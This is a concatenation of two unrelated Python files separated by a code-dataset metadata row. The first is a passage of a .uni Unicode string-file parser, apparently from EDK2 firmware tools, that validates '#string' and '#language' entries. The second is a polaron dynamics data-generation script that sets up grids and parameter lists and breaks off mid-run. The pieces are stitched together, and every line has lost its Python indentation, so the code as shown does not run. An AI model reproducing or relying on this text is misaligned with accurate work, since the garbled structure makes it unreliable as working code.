# so that the unique STRING identifier is reserved for all languages in the package list.
#
FirstLangName = self.LanguageDef[0][0]
if LangName != FirstLangName:
for Index in range (2, len (self.OrderedStringList[FirstLangName])):
Item = self.OrderedStringList[FirstLangName][Index]
if Item.UseOtherLangDef != '':
OtherLang = Item.UseOtherLangDef
else:
OtherLang = FirstLangName
self.OrderedStringList[LangName].append (StringDefClassObject(Item.StringName,
'',
Item.Referenced,
Item.Token,
OtherLang))
self.OrderedStringDict[LangName][Item.StringName] = len(self.OrderedStringList[LangName]) - 1
return True
#
# Get String name and value
#
def GetStringObject(self, Item):
Language = ''
Value = ''
Name = Item.split()[1]
# Check the string name is the upper character
if Name != '':
MatchString = re.match('[A-Z0-9_]+', Name, re.UNICODE)
if MatchString is None or MatchString.end(0) != len(Name):
EdkLogger.Error("Unicode File Parser",
ToolError.FORMAT_INVALID,
'The string token name %s in UNI file %s must be upper case character.' %(Name, self.File))
LanguageList = Item.split(u'#language ')
for IndexI in range(len(LanguageList)):
if IndexI == 0:
continue
else:
Language = LanguageList[IndexI].split()[0]
#.replace(u'\r\n', u'')
Value = \
LanguageList[IndexI][LanguageList[IndexI].find(u'\"') + len(u'\"') : LanguageList[IndexI].rfind(u'\"')]
Language = GetLanguageCode(Language, self.IsCompatibleMode, self.File)
self.AddStringToList(Name, Language, Value)
#
# Get include file list and load them
#
def GetIncludeFile(self, Item, Dir = None):
if Dir:
pass
FileName = Item[Item.find(u'!include ') + len(u'!include ') :Item.find(u' ', len(u'!include '))][1:-1]
self.LoadUniFile(FileName)
#
# Pre-process before parse .uni file
#
def PreProcess(self, File, IsIncludeFile=False):
if not os.path.exists(File.Path) or not os.path.isfile(File.Path):
EdkLogger.Error("Unicode File Parser",
ToolError.FILE_NOT_FOUND,
ExtraData=File.Path)
#
# Check file header of the Uni file
#
# if not CheckUTF16FileHeader(File.Path):
# EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
# ExtraData='The file %s is either invalid UTF-16LE or it is missing the BOM.' % File.Path)
try:
FileIn = codecs.open(File.Path, mode='rb', encoding='utf_8').readlines()
except UnicodeError as Xstr:
FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16').readlines()
except UnicodeError:
FileIn = codecs.open(File.Path, mode='rb', encoding='utf_16_le').readlines()
except:
EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, ExtraData=File.Path)
#
# get the file header
#
Lines = []
HeaderStart = False
HeaderEnd = False
if not self.UniFileHeader:
FirstGenHeader = True
else:
FirstGenHeader = False
for Line in FileIn:
Line = Line.strip()
if Line == u'':
continue
if Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and (Line.find(DT.TAB_HEADER_COMMENT) > -1) \
and not HeaderEnd and not HeaderStart:
HeaderStart = True
if not Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and HeaderStart and not HeaderEnd:
HeaderEnd = True
if Line.startswith(DT.TAB_COMMENT_EDK1_SPLIT) and HeaderStart and not HeaderEnd and FirstGenHeader:
self.UniFileHeader += Line + '\r\n'
continue
#
# Use unique identifier
#
FindFlag = -1
LineCount = 0
MultiLineFeedExits = False
#
# 0: initial value
# 1: single String entry exist
# 2: line feed exist under the some single String entry
#
StringEntryExistsFlag = 0
for Line in FileIn:
Line = FileIn[LineCount]
LineCount += 1
Line = Line.strip()
#
# Ignore comment line and empty line
#
if Line == u'' or Line.startswith(u'//'):
#
# Change the single line String entry flag status
#
if StringEntryExistsFlag == 1:
StringEntryExistsFlag = 2
#
# If the '#string' line and the '#language' line are not in the same line,
# there should be only one line feed character between them
#
if MultiLineFeedExits:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
continue
MultiLineFeedExits = False
#
# Process comment embedded in string define lines
#
FindFlag = Line.find(u'//')
if FindFlag != -1 and Line.find(u'//') < Line.find(u'"'):
Line = Line.replace(Line[FindFlag:], u' ')
if FileIn[LineCount].strip().startswith('#language'):
Line = Line + FileIn[LineCount]
FileIn[LineCount-1] = Line
FileIn[LineCount] = '\r\n'
LineCount -= 1
for Index in range (LineCount + 1, len (FileIn) - 1):
if (Index == len(FileIn) -1):
FileIn[Index] = '\r\n'
else:
FileIn[Index] = FileIn[Index + 1]
continue
CommIndex = GetCharIndexOutStr(u'/', Line)
if CommIndex > -1:
if (len(Line) - 1) > CommIndex:
if Line[CommIndex+1] == u'/':
Line = Line[:CommIndex].strip()
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
Line = Line.replace(UNICODE_WIDE_CHAR, WIDE_CHAR)
Line = Line.replace(UNICODE_NARROW_CHAR, NARROW_CHAR)
Line = Line.replace(UNICODE_NON_BREAKING_CHAR, NON_BREAKING_CHAR)
Line = Line.replace(u'\\\\', u'\u0006')
Line = Line.replace(u'\\r\\n', CR + LF)
Line = Line.replace(u'\\n', CR + LF)
Line = Line.replace(u'\\r', CR)
Line = Line.replace(u'\\t', u'\t')
Line = Line.replace(u'''\"''', u'''"''')
Line = Line.replace(u'\t', u' ')
Line = Line.replace(u'\u0006', u'\\')
#
# Check if single line has correct '"'
#
if Line.startswith(u'#string') and Line.find(u'#language') > -1 and Line.find('"') > Line.find(u'#language'):
if not Line.endswith('"'):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s misses '"' at the end of it in file %s'''
% (LineCount, File.Path))
#
# Between Name entry and Language entry can not contain line feed
#
if Line.startswith(u'#string') and Line.find(u'#language') == -1:
MultiLineFeedExits = True
if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.find(u'"') < 0:
MultiLineFeedExits = True
#
# Between Language entry and String entry can not contain line feed
#
if Line.startswith(u'#language') and len(Line.split()) == 2:
MultiLineFeedExits = True
#
# Check the situation that there only has one '"' for the language entry
#
if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.count(u'"') == 1:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s misses '"' at the end of it in file %s'''
% (LineCount, File.Path))
#
# Check the situation that there has more than 2 '"' for the language entry
#
if Line.startswith(u'#string') and Line.find(u'#language') > 0 and Line.replace(u'\\"', '').count(u'"') > 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s has more than 2 '"' for language entry in file %s'''
% (LineCount, File.Path))
#
# Between two String entry, can not contain line feed
#
if Line.startswith(u'"'):
if StringEntryExistsFlag == 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message=ST.ERR_UNIPARSE_LINEFEED_UP_EXIST % Line, ExtraData=File.Path)
StringEntryExistsFlag = 1
if not Line.endswith('"'):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s misses '"' at the end of it in file %s'''
% (LineCount, File.Path))
#
# Check the situation that there has more than 2 '"' for the language entry
#
if Line.strip() and Line.replace(u'\\"', '').count(u'"') > 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
ExtraData='''The line %s has more than 2 '"' for language entry in file %s'''
% (LineCount, File.Path))
elif Line.startswith(u'#language'):
if StringEntryExistsFlag == 2:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message=ST.ERR_UNI_MISS_STRING_ENTRY % Line, ExtraData=File.Path)
StringEntryExistsFlag = 0
else:
StringEntryExistsFlag = 0
Lines.append(Line)
#
# Convert string def format as below
#
# #string MY_STRING_1
# #language eng
# "My first English string line 1"
# "My first English string line 2"
# #string MY_STRING_1
# #language spa
# "Mi segunda secuencia 1"
# "Mi segunda secuencia 2"
#
if not IsIncludeFile and not Lines:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_NO_SECTION_EXIST, \
ExtraData=File.Path)
NewLines = []
StrName = u''
ExistStrNameList = []
for Line in Lines:
if StrName and not StrName.split()[1].startswith(DT.TAB_STR_TOKENCNAME + DT.TAB_UNDERLINE_SPLIT):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_STRNAME_FORMAT_ERROR % StrName.split()[1], \
ExtraData=File.Path)
if StrName and len(StrName.split()[1].split(DT.TAB_UNDERLINE_SPLIT)) == 4:
StringTokenList = StrName.split()[1].split(DT.TAB_UNDERLINE_SPLIT)
if (StringTokenList[3].upper() in [DT.TAB_STR_TOKENPROMPT, DT.TAB_STR_TOKENHELP] and \
StringTokenList[3] not in [DT.TAB_STR_TOKENPROMPT, DT.TAB_STR_TOKENHELP]) or \
(StringTokenList[2].upper() == DT.TAB_STR_TOKENERR and StringTokenList[2] != DT.TAB_STR_TOKENERR):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_STRTOKEN_FORMAT_ERROR % StrName.split()[1], \
ExtraData=File.Path)
if Line.count(u'#language') > 1:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_SEP_LANGENTRY_LINE % Line, \
ExtraData=File.Path)
if Line.startswith(u'//'):
continue
elif Line.startswith(u'#langdef'):
if len(Line.split()) == 2:
NewLines.append(Line)
continue
elif len(Line.split()) > 2 and Line.find(u'"') > 0:
NewLines.append(Line[:Line.find(u'"')].strip())
NewLines.append(Line[Line.find(u'"'):])
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
elif Line.startswith(u'#string'):
if len(Line.split()) == 2:
StrName = Line
if StrName:
if StrName.split()[1] not in ExistStrNameList:
ExistStrNameList.append(StrName.split()[1].strip())
elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \
DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \
DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \
DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \
ExtraData=File.Path)
continue
elif len(Line.split()) == 4 and Line.find(u'#language') > 0:
if Line[Line.find(u'#language')-1] != ' ' or \
Line[Line.find(u'#language')+len(u'#language')] != u' ':
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
if Line.find(u'"') > 0:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
StrName = Line.split()[0] + u' ' + Line.split()[1]
if StrName:
if StrName.split()[1] not in ExistStrNameList:
ExistStrNameList.append(StrName.split()[1].strip())
elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \
DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \
DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \
DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \
ExtraData=File.Path)
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append((Line[:Line.find(u'#language')]).strip())
else:
NewLines.append((Line[:Line.find(u'#language')]).strip())
NewLines.append((Line[Line.find(u'#language'):]).strip())
elif len(Line.split()) > 4 and Line.find(u'#language') > 0 and Line.find(u'"') > 0:
if Line[Line.find(u'#language')-1] != u' ' or \
Line[Line.find(u'#language')+len(u'#language')] != u' ':
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
if Line[Line.find(u'"')-1] != u' ':
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
StrName = Line.split()[0] + u' ' + Line.split()[1]
if StrName:
if StrName.split()[1] not in ExistStrNameList:
ExistStrNameList.append(StrName.split()[1].strip())
elif StrName.split()[1] in [DT.TAB_INF_ABSTRACT, DT.TAB_INF_DESCRIPTION, \
DT.TAB_INF_BINARY_ABSTRACT, DT.TAB_INF_BINARY_DESCRIPTION, \
DT.TAB_DEC_PACKAGE_ABSTRACT, DT.TAB_DEC_PACKAGE_DESCRIPTION, \
DT.TAB_DEC_BINARY_ABSTRACT, DT.TAB_DEC_BINARY_DESCRIPTION]:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_MULTI_ENTRY_EXIST % StrName.split()[1], \
ExtraData=File.Path)
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append((Line[:Line.find(u'#language')]).strip())
else:
NewLines.append((Line[:Line.find(u'#language')]).strip())
NewLines.append((Line[Line.find(u'#language'):Line.find(u'"')]).strip())
NewLines.append((Line[Line.find(u'"'):]).strip())
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
elif Line.startswith(u'#language'):
if len(Line.split()) == 2:
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append(StrName)
else:
NewLines.append(StrName)
NewLines.append(Line)
elif len(Line.split()) > 2 and Line.find(u'"') > 0:
if IsIncludeFile:
if StrName not in NewLines:
NewLines.append(StrName)
else:
NewLines.append(StrName)
NewLines.append((Line[:Line.find(u'"')]).strip())
NewLines.append((Line[Line.find(u'"'):]).strip())
else:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
elif Line.startswith(u'"'):
if u'#string' in Line or u'#language' in Line:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
NewLines.append(Line)
else:
print(Line)
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, ExtraData=File.Path)
if StrName and not StrName.split()[1].startswith(u'STR_'):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_STRNAME_FORMAT_ERROR % StrName.split()[1], \
ExtraData=File.Path)
if StrName and not NewLines:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNI_MISS_LANGENTRY % StrName, \
ExtraData=File.Path)
#
# Check Abstract, Description, BinaryAbstract and BinaryDescription order,
# should be Abstract, Description, BinaryAbstract, BinaryDescription
AbstractPosition = -1
DescriptionPosition = -1
BinaryAbstractPosition = -1
BinaryDescriptionPosition = -1
for StrName in ExistStrNameList:
if DT.TAB_HEADER_ABSTRACT.upper() in StrName:
if 'BINARY' in StrName:
BinaryAbstractPosition = ExistStrNameList.index(StrName)
else:
AbstractPosition = ExistStrNameList.index(StrName)
if DT.TAB_HEADER_DESCRIPTION.upper() in StrName:
if 'BINARY' in StrName:
BinaryDescriptionPosition = ExistStrNameList.index(StrName)
else:
DescriptionPosition = ExistStrNameList.index(StrName)
OrderList = sorted([AbstractPosition, DescriptionPosition])
BinaryOrderList = sorted([BinaryAbstractPosition, BinaryDescriptionPosition])
Min = OrderList[0]
Max = OrderList[1]
BinaryMin = BinaryOrderList[0]
BinaryMax = BinaryOrderList[1]
if BinaryDescriptionPosition > -1:
if not(BinaryDescriptionPosition == BinaryMax and BinaryAbstractPosition == BinaryMin and \
BinaryMax > Max):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \
ExtraData=File.Path)
elif BinaryAbstractPosition > -1:
if not(BinaryAbstractPosition > Max):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \
ExtraData=File.Path)
if DescriptionPosition > -1:
if not(DescriptionPosition == Max and AbstractPosition == Min and \
DescriptionPosition > AbstractPosition):
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID, \
Message=ST.ERR_UNIPARSE_ENTRY_ORDER_WRONG, \
ExtraData=File.Path)
if not self.UniFileHeader:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message = ST.ERR_NO_SOURCE_HEADER,
ExtraData=File.Path)
return NewLines
#
# Load a .uni file
#
def LoadUniFile(self, File = None):
if File is None:
EdkLogger.Error("Unicode File Parser",
ToolError.PARSER_ERROR,
Message='No unicode file is given',
ExtraData=File.Path)
self.File = File
#
# Process special char in file
#
Lines = self.PreProcess(File)
#
# Get Unicode Information
#
for IndexI in range(len(Lines)):
Line = Lines[IndexI]
if (IndexI + 1) < len(Lines):
SecondLine = Lines[IndexI + 1]
if (IndexI + 2) < len(Lines):
ThirdLine = Lines[IndexI + 2]
#
# Get Language def information
#
if Line.find(u'#langdef ') >= 0:
self.GetLangDef(File, Line + u' ' + SecondLine)
continue
Name = ''
Language = ''
Value = ''
CombineToken = False
#
# Get string def information format as below
#
# #string MY_STRING_1
# #language eng
# "My first English string line 1"
# "My first English string line 2"
# #string MY_STRING_1
# #language spa
# "Mi segunda secuencia 1"
# "Mi segunda secuencia 2"
#
if Line.find(u'#string ') >= 0 and Line.find(u'#language ') < 0 and \
SecondLine.find(u'#string ') < 0 and SecondLine.find(u'#language ') >= 0 and \
ThirdLine.find(u'#string ') < 0 and ThirdLine.find(u'#language ') < 0:
if Line.find('"') > 0 or SecondLine.find('"') > 0:
EdkLogger.Error("Unicode File Parser", ToolError.FORMAT_INVALID,
Message=ST.ERR_UNIPARSE_DBLQUOTE_UNMATCHED,
ExtraData=File.Path)
Name = Line[Line.find(u'#string ') + len(u'#string ') : ].strip(' ')
Language = SecondLine[SecondLine.find(u'#language ') + len(u'#language ') : ].strip(' ')
for IndexJ in range(IndexI + 2, len(Lines)):
if Lines[IndexJ].find(u'#string ') < 0 and Lines[IndexJ].find(u'#language ') < 0 and \
Lines[IndexJ].strip().startswith(u'"') and Lines[IndexJ].strip().endswith(u'"'):
if Lines[IndexJ][-2] == ' ':
CombineToken = True
if CombineToken:
if Lines[IndexJ].strip()[1:-1].strip():
Value = Value + Lines[IndexJ].strip()[1:-1].rstrip() + ' '
else:
Value = Value + Lines[IndexJ].strip()[1:-1]
CombineToken = False
else:
Value = Value + Lines[IndexJ].strip()[1:-1] + '\r\n'
else:
IndexI = IndexJ
break
if Value.endswith('\r\n'):
Value = Value[: Value.rfind('\r\n')]
Language = GetLanguageCode(Language, self.IsCompatibleMode, self.File)
self.AddStringToList(Name, Language, Value)
continue
#
# Load multiple .uni files
#
def LoadUniFiles(self, FileList):
if len(FileList) > 0:
for File in FileList:
FilePath = File.Path.strip()
if FilePath.endswith('.uni') or FilePath.endswith('.UNI') or FilePath.endswith('.Uni'):
self.LoadUniFile(File)
#
# Add a string to list
#
def AddStringToList(self, Name, Language, Value, Token = 0, Referenced = False, UseOtherLangDef = '', Index = -1):
for LangNameItem in self.LanguageDef:
if Language == LangNameItem[0]:
break
if Language not in self.OrderedStringList:
self.OrderedStringList[Language] = []
self.OrderedStringDict[Language] = {}
IsAdded = True
if Name in self.OrderedStringDict[Language]:
IsAdded = False
if Value is not None:
ItemIndexInList = self.OrderedStringDict[Language][Name]
Item = self.OrderedStringList[Language][ItemIndexInList]
Item.UpdateValue(Value)
Item.UseOtherLangDef = ''
if IsAdded:
Token = len(self.OrderedStringList[Language])
if Index == -1:
self.OrderedStringList[Language].append(StringDefClassObject(Name,
Value,
Referenced,
Token,
UseOtherLangDef))
self.OrderedStringDict[Language][Name] = Token
for LangName in self.LanguageDef:
#
# New STRING token will be added into all language string lists.
# so that the unique STRING identifier is reserved for all languages in the package list.
#
if LangName[0] != Language:
if UseOtherLangDef != '':
OtherLangDef = UseOtherLangDef
else:
OtherLangDef = Language
self.OrderedStringList[LangName[0]].append(StringDefClassObject(Name,
'',
Referenced,
Token,
OtherLangDef))
self.OrderedStringDict[LangName[0]][Name] = len(self.OrderedStringList[LangName[0]]) - 1
else:
self.OrderedStringList[Language].insert(Index, StringDefClassObject(Name,
Value,
Referenced,
Token,
UseOtherLangDef))
self.OrderedStringDict[Language][Name] = Index
#
# Set the string as referenced
#
def SetStringReferenced(self, Name):
#
# String stoken are added in the same order in all language string lists.
# So, only update the status of string stoken in first language string list.
#
Lang = self.LanguageDef[0][0]
if Name in self.OrderedStringDict[Lang]:
ItemIndexInList = self.OrderedStringDict[Lang][Name]
Item = self.OrderedStringList[Lang][ItemIndexInList]
Item.Referenced = True
#
# Search the string in language definition by Name
#
def FindStringValue(self, Name, Lang):
if Name in self.OrderedStringDict[Lang]:
ItemIndexInList = self.OrderedStringDict[Lang][Name]
return self.OrderedStringList[Lang][ItemIndexInList]
return None
#
# Search the string in language definition by Token
#
def FindByToken(self, Token, Lang):
for Item in self.OrderedStringList[Lang]:
if Item.Token == Token:
return Item
return None
#
# Re-order strings and re-generate tokens
#
def ReToken(self):
if len(self.LanguageDef) == 0:
return None
#
# Retoken all language strings according to the status of string stoken in the first language string.
#
FirstLangName = self.LanguageDef[0][0]
# Convert the OrderedStringList to be OrderedStringListByToken in order to faciliate future search by token
for LangNameItem in self.LanguageDef:
self.OrderedStringListByToken[LangNameItem[0]] = {}
#
# Use small token for all referred string stoken.
#
RefToken = 0
for Index in range (0, len (self.OrderedStringList[FirstLangName])):
FirstLangItem = self.OrderedStringList[FirstLangName][Index]
if FirstLangItem.Referenced == True:
for LangNameItem in self.LanguageDef:
LangName = LangNameItem[0]
OtherLangItem = self.OrderedStringList[LangName][Index]
OtherLangItem.Referenced = True
OtherLangItem.Token = RefToken
self.OrderedStringListByToken[LangName][OtherLangItem.Token] = OtherLangItem
RefToken = RefToken + 1
#
# Use big token for all unreferred string stoken.
#
UnRefToken = 0
for Index in range (0, len (self.OrderedStringList[FirstLangName])):
FirstLangItem = self.OrderedStringList[FirstLangName][Index]
if FirstLangItem.Referenced == False:
for LangNameItem in self.LanguageDef:
LangName = LangNameItem[0]
OtherLangItem = self.OrderedStringList[LangName][Index]
OtherLangItem.Token = RefToken + UnRefToken
self.OrderedStringListByToken[LangName][OtherLangItem.Token] = OtherLangItem
UnRefToken = UnRefToken + 1
#
# Show the instance itself
#
def ShowMe(self):
print(self.LanguageDef)
#print self.OrderedStringList
for Item in self.OrderedStringList:
print(Item)
for Member in self.OrderedStringList[Item]:
print(str(Member))
#
# Read content from '!include' UNI file
#
def ReadIncludeUNIfile(self, FilaPath):
if self.File:
pass
if not os.path.exists(FilaPath) or not os.path.isfile(FilaPath):
EdkLogger.Error("Unicode File Parser",
ToolError.FILE_NOT_FOUND,
ExtraData=FilaPath)
try:
FileIn = codecs.open(FilaPath, mode='rb', encoding='utf_8').readlines()
except UnicodeError as Xstr:
FileIn = codecs.open(FilaPath, mode='rb', encoding='utf_16').readlines()
except UnicodeError:
FileIn = codecs.open(FilaPath, mode='rb', encoding='utf_16_le').readlines()
except:
EdkLogger.Error("Unicode File Parser", ToolError.FILE_OPEN_FAILURE, ExtraData=FilaPath)
return FileIn
| apache-2.0 | 5,085,709,943,603,805,000 | 44.57963 | 121 | 0.500139 | false | 4.175465 | false | false | false |
kseetharam/genPolaron | datagen_qdynamics_cart_massRat.py | 1 | 7033 | import numpy as np
import pandas as pd
import xarray as xr
import Grid
import pf_dynamic_cart
import os
import sys
from timeit import default_timer as timer
# import pf_static_cart
if __name__ == "__main__":
start = timer()
# ---- INITIALIZE GRIDS ----
(Lx, Ly, Lz) = (21, 21, 21)
(dx, dy, dz) = (0.375, 0.375, 0.375)
xgrid = Grid.Grid('CARTESIAN_3D')
xgrid.initArray('x', -Lx, Lx, dx); xgrid.initArray('y', -Ly, Ly, dy); xgrid.initArray('z', -Lz, Lz, dz)
(Nx, Ny, Nz) = (len(xgrid.getArray('x')), len(xgrid.getArray('y')), len(xgrid.getArray('z')))
# print((Nx * Ny * Nz)**(1 / 3) * (0.1 / 21))
# print(3 * np.log10(2560 / 10))
kxfft = np.fft.fftfreq(Nx) * 2 * np.pi / dx; kyfft = np.fft.fftfreq(Nx) * 2 * np.pi / dy; kzfft = np.fft.fftfreq(Nx) * 2 * np.pi / dz
kgrid = Grid.Grid('CARTESIAN_3D')
kgrid.initArray_premade('kx', np.fft.fftshift(kxfft)); kgrid.initArray_premade('ky', np.fft.fftshift(kyfft)); kgrid.initArray_premade('kz', np.fft.fftshift(kzfft))
kx = kgrid.getArray('kx')
tMax = 1000
dt = 10
# tMax = 100
# dt = 0.2
tgrid = np.arange(0, tMax + dt, dt)
gParams = [xgrid, kgrid, tgrid]
# NGridPoints = (2 * Lx / dx) * (2 * Ly / dy) * (2 * Lz / dz)
NGridPoints = xgrid.size()
kx = kgrid.getArray('kx'); ky = kgrid.getArray('ky'); kz = kgrid.getArray('kz')
k_max = np.sqrt(np.max(kx)**2 + np.max(ky)**2 + np.max(kz)**2)
print('datagen_qdynamics_cart_massRat')
print('Total time steps: {0}'.format(tgrid.size))
print('UV cutoff: {0}'.format(k_max))
print('NGridPoints: {0}'.format(NGridPoints))
# Basic parameters
# Toggle parameters
toggleDict = {'Location': 'cluster', 'Dynamics': 'imaginary', 'Coupling': 'twophonon', 'Grid': 'cartesian'}
# ---- SET PARAMS ----
mB = 1
n0 = 1
gBB = (4 * np.pi / mB) * 0.05
Params_List = []
# mI_Vals = np.array([1, 2, 5, 10])
# aIBi_Vals = np.array([-10.0, -5.0, -2.0])
# # P_Vals = np.array([0.1, 0.4, 0.8, 0.9, 1.0, 1.1, 1.2, 1.4, 1.6, 2.0, 2.4, 2.7, 3.0, 4.0, 5.0])
# P_Vals = np.array([3.2, 3.4, 3.6, 3.8, 3.9, 4.1, 4.2, 4.4, 4.6, 4.8, 5.2, 5.4, 5.6, 5.8, 6.0])
# for mI in mI_Vals:
# for aIBi in aIBi_Vals:
# for P in P_Vals:
# sParams = [mI, mB, n0, gBB]
# cParams = [P, aIBi]
# if toggleDict['Location'] == 'home':
# datapath = '/home/kis/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
# elif toggleDict['Location'] == 'work':
# datapath = '/media/kis/Storage/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
# elif toggleDict['Location'] == 'cluster':
# datapath = '/n/regal/demler_lab/kis/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
# if toggleDict['Dynamics'] == 'real':
# innerdatapath = datapath + '/redyn'
# elif toggleDict['Dynamics'] == 'imaginary':
# innerdatapath = datapath + '/imdyn'
# if toggleDict['Grid'] == 'cartesian':
# innerdatapath = innerdatapath + '_cart'
# elif toggleDict['Grid'] == 'spherical':
# innerdatapath = innerdatapath + '_spherical'
# if toggleDict['Coupling'] == 'frohlich':
# innerdatapath = innerdatapath + '_froh'
# elif toggleDict['Coupling'] == 'twophonon':
# innerdatapath = innerdatapath
# Params_List.append([sParams, cParams, innerdatapath])
# redo (mI, P, aIBi)
redo_Vals = [(2, 4.4, -5.0), (2, 4.6, -5.0), (2, 4.8, -5.0),
(1, 3.2, -2.0), (1, 3.4, -2.0), (1, 3.6, -2.0),
(1, 3.8, -2.0), (1, 3.9, -2.0), (1, 4.1, -5.0),
(1, 4.1, -2.0), (1, 4.2, -5.0), (1, 4.2, -2.0),
(1, 4.4, -5.0), (1, 4.6, -2.0), (1, 5.6, -10.0),
(1, 5.8, -10.0), (1, 6.0, -10.0)]
for tup in redo_Vals:
(mI, P, aIBi) = tup
sParams = [mI, mB, n0, gBB]
cParams = [P, aIBi]
if toggleDict['Location'] == 'home':
datapath = '/home/kis/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
elif toggleDict['Location'] == 'work':
datapath = '/media/kis/Storage/Dropbox/VariationalResearch/HarvardOdyssey/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
elif toggleDict['Location'] == 'cluster':
datapath = '/n/regal/demler_lab/kis/genPol_data/NGridPoints_{:.2E}/massRatio={:.1f}'.format(NGridPoints, mI / mB)
if toggleDict['Dynamics'] == 'real':
innerdatapath = datapath + '/redyn'
elif toggleDict['Dynamics'] == 'imaginary':
innerdatapath = datapath + '/imdyn'
if toggleDict['Grid'] == 'cartesian':
innerdatapath = innerdatapath + '_cart'
elif toggleDict['Grid'] == 'spherical':
innerdatapath = innerdatapath + '_spherical'
if toggleDict['Coupling'] == 'frohlich':
innerdatapath = innerdatapath + '_froh'
elif toggleDict['Coupling'] == 'twophonon':
innerdatapath = innerdatapath
Params_List.append([sParams, cParams, innerdatapath])
# # ---- COMPUTE DATA ON COMPUTER ----
# runstart = timer()
# for ind, Params in enumerate(Params_List):
# loopstart = timer()
# [sParams, cParams, innerdatapath] = Params_List[ind]
# [mI, mB, n0, gBB] = sParams
# [P, aIBi] = cParams
# dyncart_ds = pf_dynamic_cart.quenchDynamics_DataGeneration(cParams, gParams, sParams, toggleDict)
# dyncart_ds.to_netcdf(innerdatapath + '/P_{:.3f}_aIBi_{:.2f}.nc'.format(P, aIBi))
# loopend = timer()
# print('Index: {:d}, P: {:.2f}, aIBi: {:.2f} Time: {:.2f}'.format(ind, P, aIBi, loopend - loopstart))
# end = timer()
# print('Total Time: {:.2f}'.format(end - runstart))
# ---- COMPUTE DATA ON CLUSTER ----
runstart = timer()
